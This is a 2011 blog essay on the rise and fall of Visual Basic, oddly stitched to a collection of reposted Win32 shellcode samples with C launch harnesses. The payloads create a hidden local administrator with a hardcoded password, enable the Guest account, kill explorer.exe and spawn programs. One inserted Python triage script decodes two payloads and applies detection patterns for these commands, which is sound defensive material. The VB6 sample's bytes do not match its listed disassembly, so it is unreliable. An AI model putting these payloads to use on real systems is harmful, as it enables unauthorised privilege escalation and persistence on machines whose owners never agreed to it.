Tuesday, August 09, 2011

Rise and Fall of Visual Basic


Great empires often fall from within. 
The death knell for Visual Basic is premature, but it's true that VB has deviated from its original vision as an "Application Construction Kit" for the masses and has lost significant market share as a result.  
Tim Anderson summed it up best:
It sounds like perfection.  Microsoft had perhaps the largest number of developers in the world hooked on a language which in turn was hooked to Windows.  Yet Microsoft took this asset of incalculable value and apparently tossed it aside.  Back in 2002, Microsoft announced that the language was to be replaced by something new, different and incompatible.  That caused rumblings that continue today.  Developers expressed emotions ranging from frustration to anger.  They felt betrayed.
Much has been written lately about the fall of Visual Basic, triggered by an Evans Data survey indicating that VB use has dropped 35% in the past year, and other language surveys show VB falling behind its brother C# and market leader Java.
The problem is simply that when Visual Basic became VB.NET, it became a "real" programming language for trained developers, no longer the layman's "Application Construction Kit" of its original vision.  As such, there's little to positively distinguish VB from the other .NET programming languages, especially the superior and more popular C#.  The result is an expected drop in market share. 
Perhaps next-generation Web development environments like Popfly and Silverlight will fill the gap left by VB.  And there is a concerted effort including a web petition to convince Microsoft to support and upgrade the last "simple" version of Visual Basic, VB6.  This support is unlikely, however, and VB's reign as "programming language for the masses" is over.

Humble Beginning

Alan Cooper is widely regarded as the father of Visual Basic.  In 1987, Cooper was a director at Coactive Computing Corporation where he developed "Tripod," an improved shell/desktop for the fledgling Windows operating system.  After initial testing, Cooper realized that "every user would need their own personal shell, configured to their own needs and skill levels."  The idea of a "shell construction set" was born.  There would be a palette of tools and controls, which users could drag & drop onto forms to create their custom shell.
Cooper began shopping the product around Silicon Valley seeking a publisher.  There was little interest until March 1988 when Cooper showed a prototype to Microsoft CEO Bill Gates.  Visionary that he is, the 32-year-old billionaire immediately saw Tripod's potential.  Gates declared that Tripod was "cool" and would have significant impact across Microsoft's entire product line.  In a few months the deal was done, Tripod became Microsoft's "Ruby," and Cooper assembled a team of engineers to deliver a commercial product.
The original intention was to ship Ruby with Windows 3.0 as a more powerful shell, but Microsoft instead decided to use the OS/2 shell, which Microsoft owned at the time from its deal with IBM.  Microsoft decided to delay Ruby and convert it from a shell construction set for all users to a visual programming language for professional developers by adding QuickBasic.  At first, Cooper was upset with Microsoft's decision and argued against it.  However, after seeing the power of the eventual product, Cooper soon became an "enthusiastic Visual Basic supporter."

An Empire Rises

Visual Basic 1.0 for Windows was first released on May 20, 1991 at the Windows World convention in Atlanta where Gates described it as "awesome."  InfoWorld Magazine described Visual Basic as a "stunning new miracle" that would "dramatically change the way people feel about and use Windows."  Stewart Alsop wrote in the New York Times that Visual Basic is "the perfect programming environment for the 1990s."
VB version 3 (1993) added database access tools and Object Linking and Embedding (OLE).  Visual Basic for Applications (VBA) was released in 1993 to replace the disparate macro features across Microsoft's product line and has since become the de facto standard for application programming in Microsoft Office and other products. 
VB4 was released in 1995 to support the 32-bit Windows 95 operating system.  VB5 was released in 1997 with significant improvements to the user interface, ability to create true executables and custom controls, and support for Microsoft's Active-X technology.  It also dropped support for the 16-bit Windows 3.x operating system.
VB6 was released in 1998 as part of Visual Studio 6.0 that also included Microsoft's Visual C++ development environment.  VB6 improved database access, added Internet features, language improvements and wizards.  Many organizations still use VB6 today.
Microsoft surveys in the late 1990s showed that nearly two thirds of all business application programming on Windows PCs was done in Visual Basic.  VB's overwhelming success was largely because it made Windows programming much easier.  Prior to VB, Windows programming required mastery of the massive and complex Win32 APIs and took hundreds of lines of code to create even simple screen elements.  VB eliminated the need to write lengthy code for the user interface, allowing developers to focus on business logic and produce usable Windows applications relatively quickly. 
World-renowned Windows programming expert Charles Petzold told the New York Times, "For those of us who make our living explaining the complexities of Windows programming to programmers, Visual Basic poses a real threat to our livelihood."

.NET Pulls Out the Rug

In the late 1990s, as the Internet was exploding, Microsoft had just successfully fought off a full frontal assault on its market dominance by killing the Netscape Web browser with its free Internet Explorer.  But Microsoft was facing a host of new challenges, including serious problems with COM, C++, DLL hell, the Web as a platform, security, and strong competition from Java, which was emerging as the go-to language for Web development.
Microsoft's response was .NET, an object-oriented development environment and framework that provides a highly-functional abstraction layer between the operating system and programming language.  Microsoft announced .NET to the world in June 2000 and released version 1.0 of Visual Basic .NET and the .NET framework in January 2002.  Microsoft also labeled everything .NET including Office to demonstrate its commitment and dominance on this new thing called the Web. 
Unfortunately for VB6 developers, the .NET object-oriented platform is far different than the procedural VB6 programming language, and so there was no easy way for developers to migrate their legacy VB6 code to VB.NET.  Even though a few automated tools emerged to aid the conversion, due to the subtleties and intricacies of the languages, a significant amount of manual, error-prone labor was required.  For larger projects, one would be better off re-writing the application from scratch in .NET using object-oriented architecture and best practices, than performing a mechanical port of VB6 code to VB.NET.
But starting over from scratch means evaluating all options on the table.  And to most "Mom & Pop" developers, Visual Basic .NET appears to be an enterprise product with an enterprise price tag, with significant overhead required in terms of programming skills and computer resources.  So instead of trying to manage the complicated move from VB6 to VB.NET, many VB6 developers moved their applications to the Web, using Java, JavaScript, Perl and PHP.  As a result, millions of developers have left the Microsoft mothership and are unlikely to return.

Don't worry, be happy, VB fans.  Programming languages never die, they just fade away.  My COBOL/RPG2 programming buddies were working hundred-hour weeks during Y2K!

VB is Not R.I.P.

Much of the negative press lately about VB derives from the Evans Data survey indicating that overall use of Visual Basic has dropped 35% in just one year, including a 26% drop for VB.NET specifically.  As a result, Java now leads with 45% market share (developers using Java some of the time), followed by C/C++ at 40%, C# at 32%, and Visual Basic at 21%.
Although a 35% drop in market share is significant, it's too early to write the Visual Basic obituary.  Most companies would love to own 21% of a multi-billion-dollar market, though that may not be good enough for Microsoft.  But combined with C# and managed C++, the Microsoft .NET family still commands half the software development market.
What is clear is that Visual Basic is no longer the programming language for the masses of its original vision.  As a result, VB.NET will have to compete with the other .NET and Web languages on its own merits.  With its wordy syntax and second-class status relative to big brother C#, it's unlikely the Visual Basic empire will rise once again.  But Visual Basic will continue to be an effective Windows development platform for many years to come.

win32 generic - add new local administrator 326 bytes
=====================================================

/*
Title: generic win32 - add new local administrator 326 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Dynamic opcode, encoded shellcode
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.100427-1636 and Build 2600.080413-2111
Greetz: offsec team, inj3ct0r team, hdm
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

char code[] =
"\xda\xde\xd9\x74\x24\xf4\xb8\x22\xd2\x27\x7a\x29\xc9\xb1\x4b"
"\x5b\x31\x43\x1a\x83\xeb\xfc\x03\x43\x16\xe2\xd7\x3b\xbc\x7a"
"\x17\xbc\x95\x4b\xd7\xd8\x92\xec\xe7\xa5\x65\x94\x08\x2d\x25"
"\x69\x9d\x41\xba\xdc\x2a\xe1\xca\xf7\x25\xe2\xca\x07\xbe\xa2"
"\xfe\x8a\x80\x5e\x74\xd4\x3c\xc1\x49\xb5\xb7\x91\x69\x12\x4c"
"\x2c\x4e\xd1\x06\xaa\xd6\xe4\x4c\x3f\x6c\xff\x1b\x1a\x51\xfe"
"\xf0\x78\xa5\x49\x8d\x4b\x4d\x48\x7f\x82\xae\x7a\xbf\x19\xfc"
"\xf9\xff\x96\xfa\xc0\x30\x5b\x04\x04\x25\x90\x3d\xf6\x9d\x71"
"\x37\xe7\x56\xdb\x93\xe6\x83\xba\x50\xe4\x18\xc8\x3d\xe9\x9f"
"\x25\x4a\x15\x14\xb8\xa5\x9f\x6e\x9f\x29\xc1\xad\x72\x01\x53"
"\xd9\x27\x5d\xac\xe6\xb1\xa5\xd2\xdc\xca\xa9\xd4\xdc\x4b\x6e"
"\xd0\xdc\x4b\x71\xe0\x12\x3e\x97\xd1\x42\xd8\x57\xd6\x92\x43"
"\xa9\x5c\x9c\x0d\x8e\x83\xd3\x70\xc2\x4c\x13\x73\x1b\xc4\xf6"
"\x9b\x43\x29\x07\xa4\xfd\x17\x1c\xb9\xa0\x1a\x9f\x3a\xd4\xd4"
"\xde\x82\xee\x16\xe0\x04\x07\xa0\x1f\xfb\x28\x26\xd1\x5f\xe6"
"\x79\xbd\x0c\xf7\x2f\x39\x82\xc7\x80\xbe\xb1\xcf\xc8\xad\xc5"
"\x2f\xf7\x4e\x57\xb4\x26\xf5\xdf\x51\x17\xda\x7c\xba\x39\x41"
"\xf7\x9a\xb0\xfa\x92\xa8\x1a\x8f\x39\x2e\x2e\x06\xa6\x80\xf0"
"\xb5\x16\x8f\x9b\x65\x78\x2e\x38\x01\xa6\x96\xe6\xe9\xc8\xb3"
"\x92\xc9\x78\x53\x38\x68\xed\xcc\xcc\x05\x98\x62\x11\xb8\x06"
"\xee\x38\x54\xae\x83\xce\xda\x51\x10\x40\x68\xe1\xf8\xed\xe9"
"\x66\x8c\x78\x95\x58\x4e\x54\x34\xfd\xea\xaa";

int main(int argc, char **argv)
{
    ((void (*)())code)();
    printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk");
    return 0;
}

win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
====================================================================

/*
Title: win32/xp pro sp3 (EN) 32-bit - add new local administrator 113 bytes
Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com
Method: Hardcoded opcodes (kernel32.winexec@7c8623ad, kernel32.exitprocess@7c81cafa)
Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.080413-2111
Greetz: offsec and inj3ct0r teams
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

char code[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23"
"\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca"
"\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63"
"\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"
"\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x73"
"\x65\x63\x75\x69\x64\x30\x20\x6d\x30\x6e"
"\x6b\x20\x2f\x61\x64\x64\x20\x26\x26\x20"
"\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67"
"\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e"
"\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20"
"\x73\x65\x63\x75\x69\x64\x30\x20\x2f\x61"
"\x64\x64\x00";

int main(int argc, char **argv)
{
    ((void (*)())code)();
    printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk");
    return 0;
}


win32/xp pro sp3 MessageBox shellcode

/*
Title: win32/xp pro sp3 MessageBox shellcode 11 bytes
Author: d3c0der - d3c0der[at]hotmail[dot]com
Tested on: WinXP Pro SP3 (EN) # ( run MessageBox that show an error message )
website : Www.AttackerZ.ir
spt : All friends ;)
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

char code[] = "\x33\xd2\x52\x52\x52\x52\xe8\xbe\xe9\x44\x7d";

int main(int argc, char **argv)
{
    ((void (*)())code)();
    return 0;
}


Activate Guest Account Shellcode

#(+) Exploit Title: win32/xp sp3 Activate Guest Account Shellcode 67 Bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit

Code:
____________________________________________________________________________________________________

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

char code[] = "\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23"
"\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca"
"\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63"
"\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"
"\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x67\x75\x65\x73\x74\x20\x2f\x61\x63\x74\x69\x76\x65\x3a\x79\x65\x73\x00";

int main(int argc, char **argv)
{
    ((void (*)())code)();
    printf("Guest Account Activated");
    return 0;
}

Windows Magnifier Shellcode

#(+) Exploit Title: win32/xp sp3 Windows Magnifier Shellcode 52 bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit

Code:
____________________________________________________________________________________________________

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(){
    unsigned char shellcode[]=
    "\xeb\x1b\x5b\x31\xc0\x50\x31"
    "\xc0\x88\x43\x35\x53\xbb\xad\x23\x86\x7c"
    "\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3\xe8\xe0\xff\xff\xff"
    "\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"
    "\x6d\x61\x67\x6e\x69\x66\x79";

    printf("Size = %d bytes\n", strlen(shellcode));

    ((void (*)())shellcode)();

    return 0;
}


win32/xp sp3 Force Kill explorer.exe process

#(+) Exploit Title: win32/xp sp3 Force Kill explorer.exe process Shellcode 73 Bytes
#(+) Author : ^Xecuti0n3r
#(+) E-mail : xecuti0n3r()yahoo.com
#(+) Category : win32-Shellcodes
#(+) Tested on : Windows Xp 32 bit

Code:
____________________________________________________________________________________________________

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

int main(){
    unsigned char shellcode[]=
    "\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x35\x53\xbb\xad\x23\x86\x7c"
    "\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3"
    "\xe8\xe0\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x54\x41\x53\x4b"
    "\x4b\x49\x4c\x4c\x20\x2f\x46\x20\x2f\x49\x4d\x20\x65\x78\x70\x6c\x6f\x72\x65\x72\x2e\x65\x78\x65";

    printf("Size = %d bytes\n", strlen(shellcode));

    ((void (*)())shellcode)();

    return 0;
}
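The four hardcoded-opcode samples above (the 113-byte add-administrator, guest-activation, Magnifier and explorer-kill payloads) share one layout: a short jump to a `call` that lands back on `pop ebx`, so `ebx` points at a trailing ASCII command line, which is then handed to `WinExec` at a fixed address. From the defender's side, that command line is the artefact that matters, because it is exactly what lands in process-creation telemetry (Security event 4688, Sysmon event 1) when the payload fires. The Python below is an added triage example, not code from any of the posts: it treats the shellcode bytes purely as data (nothing is executed), walks the stub to recover the command string from two of the page's samples, and runs the same indicator patterns over a few constructed 4688-style log lines. The indicator labels, the log-line format and the sample log are my own constructions.

```python
"""Triage helper for the WinExec-style shellcode samples above.

Added example, not code from the posts. The shellcode bytes are handled
purely as data; this script never executes them.
"""
import re
from typing import List, Optional, Tuple

# Bytes copied from two samples on this page: the 113-byte "add new local
# administrator" payload and the 73-byte "force kill explorer.exe" payload.
ADD_ADMIN_SC = (
    b"\xeb\x16\x5b\x31\xc0\x50\x53\xbb\xad\x23"
    b"\x86\x7c\xff\xd3\x31\xc0\x50\xbb\xfa\xca"
    b"\x81\x7c\xff\xd3\xe8\xe5\xff\xff\xff\x63"
    b"\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20"
    b"\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x73"
    b"\x65\x63\x75\x69\x64\x30\x20\x6d\x30\x6e"
    b"\x6b\x20\x2f\x61\x64\x64\x20\x26\x26\x20"
    b"\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67"
    b"\x72\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e"
    b"\x69\x73\x74\x72\x61\x74\x6f\x72\x73\x20"
    b"\x73\x65\x63\x75\x69\x64\x30\x20\x2f\x61"
    b"\x64\x64\x00"
)
KILL_EXPLORER_SC = (
    b"\xeb\x1b\x5b\x31\xc0\x50\x31\xc0\x88\x43\x35\x53\xbb\xad\x23\x86\x7c"
    b"\xff\xd3\x31\xc0\x50\xbb\xfa\xca\x81\x7c\xff\xd3"
    b"\xe8\xe0\xff\xff\xff\x63\x6d\x64\x2e\x65\x78\x65\x20\x2f\x63\x20\x54\x41\x53\x4b"
    b"\x4b\x49\x4c\x4c\x20\x2f\x46\x20\x2f\x49\x4d\x20\x65\x78\x70\x6c\x6f\x72\x65\x72\x2e\x65\x78\x65"
)

PRINTABLE = set(range(0x20, 0x7F))


def extract_winexec_command(blob: bytes) -> Optional[str]:
    """Recover the command string from a jmp / call / pop-ebx stub.

    Layout handled (the one every hardcoded-opcode sample on this page uses):
      offset 0:    EB rel8    jmp forward to the call
      offset 2:    5B         pop ebx (receives the string address)
      jmp target:  E8 rel32   call back to offset 2
      after call:  ASCII command, NUL-terminated or running to end of blob
    Returns None when the blob does not fit that shape.
    """
    if len(blob) < 7 or blob[0] != 0xEB or blob[2] != 0x5B:
        return None
    call_off = 2 + int.from_bytes(blob[1:2], "little", signed=True)
    if call_off < 0 or call_off + 5 > len(blob) or blob[call_off] != 0xE8:
        return None
    rel32 = int.from_bytes(blob[call_off + 1:call_off + 5], "little", signed=True)
    if call_off + 5 + rel32 != 2:          # the call must land on pop ebx
        return None
    raw = blob[call_off + 5:]
    nul = raw.find(b"\x00")
    if nul >= 0:
        raw = raw[:nul]
    if not raw or any(b not in PRINTABLE for b in raw):
        return None
    return raw.decode("ascii")


# Indicator patterns for process-creation command lines (labels are my own).
# Matching is case-insensitive because cmd.exe and net.exe are.
INDICATORS: List[Tuple[str, str]] = [
    ("local-account-created",   r"\bnet1?\s+user\s+\S+(?:\s+\S+)?\s+/add\b"),
    ("account-enabled",         r"\bnet1?\s+user\s+\S+\s+/active:yes\b"),
    ("added-to-administrators", r"\bnet1?\s+localgroup\s+administrators\s+\S+\s+/add\b"),
    ("forced-process-kill",     r"\btaskkill\b.*\s/f\b"),
]


def classify(cmdline: str) -> List[str]:
    """Return the indicator labels that fire on one command line."""
    return [label for label, rx in INDICATORS if re.search(rx, cmdline, re.IGNORECASE)]


# Constructed sample lines in the shape of Security 4688 / Sysmon event 1
# process-creation records; not real telemetry.
SAMPLE_LOG = (
    'EventID=4688 NewProcessName=C:\\Windows\\System32\\cmd.exe '
    'CommandLine="cmd.exe /c net user secuid0 m0nk /add && net localgroup administrators secuid0 /add"\n'
    'EventID=4688 NewProcessName=C:\\Windows\\System32\\net.exe '
    'CommandLine="net user guest /active:yes"\n'
    'EventID=4688 NewProcessName=C:\\Windows\\System32\\notepad.exe '
    'CommandLine="notepad.exe report.txt"\n'
    'EventID=4688 NewProcessName=C:\\Windows\\System32\\cmd.exe '
    'CommandLine="cmd.exe /c TASKKILL /F /IM explorer.exe"\n'
)

CMDLINE_RX = re.compile(r'CommandLine="([^"]*)"')


def scan_log(text: str) -> List[Tuple[int, List[str]]]:
    """(line number, labels) for every log line that trips an indicator."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = CMDLINE_RX.search(line)
        if m:
            labels = classify(m.group(1))
            if labels:
                hits.append((n, labels))
    return hits


if __name__ == "__main__":
    for name, blob in (("add-admin", ADD_ADMIN_SC), ("kill-explorer", KILL_EXPLORER_SC)):
        cmd = extract_winexec_command(blob)
        print(f"{name}: {cmd!r} -> {classify(cmd) if cmd else []}")
    for n, labels in scan_log(SAMPLE_LOG):
        print(f"log line {n}: {', '.join(labels)}")
```

The extractor deliberately refuses anything that does not match the jmp/call/pop shape (the 11-byte MessageBox sample, for instance, returns `None`), so it can be pointed at arbitrary blobs during triage without guessing. The same `classify` function works on the recovered string and on live command-line telemetry, which is the point: once the embedded command is known, the detection logic does not care whether it arrived via shellcode or a typed console.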


VB6_vbaExceptHandler - SEH (calc.exe) ShellCode

# =========[ Sh31LC0d3.C ]=====>
/*
###
# Title : Win32 VB6_vbaExceptHandler - SEH (calc.exe) ShellCode - 149 Bytes
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com | ked-h@exploit-id.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# platform : Win32
# Target : VB6 ExE Project >*> Command : Shell ("calc.exe")
# Tested on : Windows XP SP3 France
###
*/
// TesT Project >> Compile As Name k3d4n5.exe <<
/*
004018E0 > 55               | PUSH EBP
004018E1 . 8BEC             | MOV EBP,ESP
004018E3 . 83EC 0C          | SUB ESP,0C
004018E6 . 68 96104000      | PUSH <JMP.&MSVBVM60.__vbaExceptHandler> ; SE handler installation (SEH)
004018EB . 64:A1 00000000   | MOV EAX,DWORD PTR FS:[0]
004018F1 . 50               | PUSH EAX
004018F2 . 64:8925 00000000 | MOV DWORD PTR FS:[0],ESP
004018F9 . 83EC 30          | SUB ESP,30
004018FC . 53               | PUSH EBX
004018FD . 56               | PUSH ESI
004018FE . 57               | PUSH EDI
004018FF . 8965 F4          | MOV DWORD PTR SS:[EBP-C],ESP
00401902 . C745 F8 80104000 | MOV DWORD PTR SS:[EBP-8],k3d4n5.00401080
00401909 . 8B45 08          | MOV EAX,DWORD PTR SS:[EBP+8]
0040190C . 8BC8             | MOV ECX,EAX
0040190E . 83E1 01          | AND ECX,1
00401911 . 894D FC          | MOV DWORD PTR SS:[EBP-4],ECX
00401914 . 24 FE            | AND AL,0FE
00401916 . 50               | PUSH EAX
00401917 . 8945 08          | MOV DWORD PTR SS:[EBP+8],EAX
0040191A . 8B10             | MOV EDX,DWORD PTR DS:[EAX]
0040191C . FF52 04          | CALL DWORD PTR DS:[EDX+4]
0040191F . 33F6             | XOR ESI,ESI
00401921 . 8D55 CC          | LEA EDX,DWORD PTR SS:[EBP-34]
00401924 . 8975 CC          | MOV DWORD PTR SS:[EBP-34],ESI
00401927 . 8D4D DC          | LEA ECX,DWORD PTR SS:[EBP-24]
0040192A . 8975 DC          | MOV DWORD PTR SS:[EBP-24],ESI
0040192D . C745 D4 616C632E657865 | MOV DWORD PTR SS:[EBP-2C], calc.exe
00401934 . C745 CC 08000000 | MOV DWORD PTR SS:[EBP-34],8
0040193B . FF15 68104000    | CALL DWORD PTR DS:[<&MSVBVM60.__vbaVarDup>] ; MSVBVM60.__vbaVarDup
00401941 . 8D45 DC          | LEA EAX,DWORD PTR SS:[EBP-24]
00401944 . 6A 02            | PUSH 2
00401946 . 50               | PUSH EAX
00401947 . FF15 34104000    | CALL DWORD PTR DS:[<&MSVBVM60.#600>] ; MSVBVM60.rtcShell
0040194D . 8D4D DC          | LEA ECX,DWORD PTR SS:[EBP-24]
00401950 . DDD8             | FSTP ST
00401952 . FF15 08104000    | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>] ; MSVBVM60.__vbaFreeVar
00401958 . 8975 FC          | MOV DWORD PTR SS:[EBP-4],ESI
0040195B . 9B               | WAIT
0040195C . 68 6E194000      | PUSH k3d4n5.0040196E
00401961 . EB 0A            | JMP SHORT k3d4n5.0040196D
00401963 . 8D4D DC          | LEA ECX,DWORD PTR SS:[EBP-24]
00401966 . FF15 08104000    | CALL DWORD PTR DS:[<&MSVBVM60.__vbaFreeVar>] ; MSVBVM60.__vbaFreeVar
0040196C . C3               | RETN
*/

/* Shellcode bytes exactly as listed by the author. */
char SEH[] =
"\x55\x8B\xEC\x83\xEC\x0C\x68\x96\x10\x40\x00\x64\xA1\x00\x00\x00\x00\x50\x64"
"\x89\x25\x00\x00\x00\x00\x00\x40\x18\xF9\x83\xEC\x30\x53\x56\x57\x89\x65\xF4"
"\xC7\x45\xF8\x80\x10\x40\x00\x8B\x45\x08\x8B\xC8\x83\xE1\x01\x89\x4D\xFC\x24"
"\xFE\x50\x89\x45\x08\x8B\x10\xFF\x52\x04\x33\xF6\x8D\x55\xCC\x89\x75\xCC\x8D"
"\x4D\xDC\x89\x75\xDC\xC7\x45\xD4\x61\x6C\x63\x2E\x65\x78\x65\xC7\x45\xCC\x08"
"\x00\x00\x00\xFF\x15\x68\x10\x40\x00\x8D\x45\xDC\x6A\x02\x50\xFF\x15\x34\x10"
"\x00\x8D\x4D\xDC\xDD\xD8\xFF\x15\x08\x10\x40\x00\x89\x75\xFC\x9B\x68\x41\x42"
"\x43\x40\x44\xEB\x0A\x8D\x4D\xDC\xFF\x15\x08\x10\x40\x00\xC3";

int main(int argc, char **argv)
{
    int (*shellcode)();

    /* Point a function pointer at the byte array and call it. */
    shellcode = (int (*)()) SEH;
    (*shellcode)();

    return 0;
}

/*
